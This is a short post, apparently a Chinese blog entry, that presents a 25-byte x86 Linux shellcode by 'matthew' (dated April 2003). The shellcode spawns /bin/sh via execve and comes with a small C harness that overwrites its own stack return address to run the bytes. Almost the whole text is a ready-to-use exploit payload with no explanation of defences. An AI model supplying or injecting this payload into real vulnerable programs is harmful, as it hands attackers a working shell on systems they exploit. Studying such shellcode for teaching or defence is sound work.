根据昨天写的BSD shellcode的思想,今天写了一个Linux上的Shellcode。

/*
 * Shellcode for Linux
 * execve /bin/sh
 * by matthew
 * Apr 12 2003
 *
 * 25 bytes.
 *
 *    __@
 *  _ \<_
 * (_)/(_) matthew@arbornet.org
 *
 */

char shellcode[] =
"\x31\xc0"
"\x50"
"\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x89\xe2"
"\xb0\x0b"
"\xcd\x80";

int
main()
{
    int ret;
    
    printf("Shellcode Length = %d\n", strlen(shellcode));
    (*((int *)&ret +2 ))=(int)shellcode;
}